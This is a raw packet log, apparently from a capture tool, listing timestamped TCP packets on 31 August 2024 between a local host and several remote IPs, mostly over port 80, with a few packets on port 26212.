Aug 31, 2024 15:44:19.512573957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512583971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512609959 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.512622118 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.512738943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512790918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.512793064 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512804985 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512835026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.512850046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512851954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.512861013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512873888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512885094 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512897015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.512931108 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.512950897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.514779091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.514832973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.514841080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.514858007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.514873981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.514883995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.514888048 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.514904022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.514924049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515042067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515053034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515063047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515074015 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515093088 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515096903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515108109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515119076 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515120983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515134096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515137911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515151978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515161991 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515163898 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515172958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515182972 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515193939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515202045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515202999 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515213966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515223026 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515225887 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515242100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515253067 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515259981 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515269995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515280008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515284061 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515291929 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515302896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515302896 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515316010 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515317917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515326023 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515336990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515348911 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515350103 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515362024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515373945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515381098 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515384912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515397072 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515399933 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515408993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515419960 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515425920 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515443087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515445948 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515454054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.515460014 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515487909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.515502930 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.516840935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.516851902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.516863108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.516897917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.516911030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.516921997 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.516922951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.516937971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.516949892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.516964912 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.516990900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.517023087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517034054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517045021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517069101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.517093897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.517139912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517149925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517199039 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.517558098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517569065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517580986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517591000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517610073 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.517623901 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.517904997 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517915964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517926931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.517952919 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.517978907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518008947 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518021107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518032074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518043041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518052101 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518064022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518083096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518107891 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518151045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518207073 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518218994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518229961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518239975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518251896 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518263102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518268108 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518295050 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518305063 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518606901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518618107 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518627882 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518656969 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518667936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518678904 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518678904 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518690109 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518702030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.518711090 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518724918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.518752098 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519251108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519260883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519272089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519296885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519309998 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519485950 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519495964 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519505978 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519514084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519524097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519531965 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519541979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519552946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519558907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519572973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519581079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519584894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519596100 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519604921 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519604921 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519614935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519625902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519634962 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519637108 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519644976 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519654989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519659042 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519665956 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519673109 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.519679070 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.519696951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.520577908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.520684004 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.520694017 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.520705938 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.520739079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.520751953 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.520773888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.520785093 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.520793915 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.520798922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.520829916 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.520850897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.523643970 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.525335073 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:19.530114889 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:19.551472902 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.551482916 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.551491976 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.551501036 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.551559925 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.551559925 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.551774979 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.551784992 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.551798105 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.551805973 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.551851034 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.551851034 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.589498043 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.589576006 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.589648962 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.589754105 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.590353966 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.590385914 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.590396881 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.590406895 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.590406895 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:19.590429068 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.590466976 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:19.603326082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.603369951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.603400946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.603410006 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.603425026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.603435993 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.603445053 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.603445053 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.603456020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.603465080 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.603482008 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.603491068 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.603518009 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.604700089 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.604710102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.604720116 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.604753971 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.604777098 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.604876995 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.604887009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.604897022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.604906082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.604918957 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.604933023 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.604960918 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.606355906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606365919 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606374979 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606408119 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.606417894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606430054 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606432915 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.606442928 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606458902 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606462002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.606470108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606478930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606489897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.606514931 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.606590986 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606601000 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606610060 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606621027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606631041 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606642008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606672049 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.606687069 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.606689930 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.606728077 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607323885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607335091 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607343912 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607378960 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607399940 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607414007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607434034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607445955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607456923 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607462883 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607466936 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607474089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607495070 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607517958 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607547045 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607556105 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607562065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607568026 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607572079 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607580900 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607594013 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607601881 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607609987 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607620001 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607628107 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607631922 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607646942 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607660055 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607681990 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607682943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607692003 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607702971 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607712030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.607717991 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607732058 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.607753038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.608338118 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608347893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608357906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608390093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.608402967 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.608423948 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608433008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608443022 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608452082 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608460903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608467102 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.608504057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.608597040 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608608007 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608617067 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608627081 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608644962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.608669043 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.608676910 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608685970 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608691931 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.608736992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.608750105 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.609270096 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609322071 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.609395027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609404087 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609411955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609428883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609436989 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609446049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609447002 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.609457016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609481096 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.609498024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.609534025 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609544992 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609554052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609563112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:19.609587908 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:19.609596968 CEST	49727	80	192.168.2.5	52.212.52.84
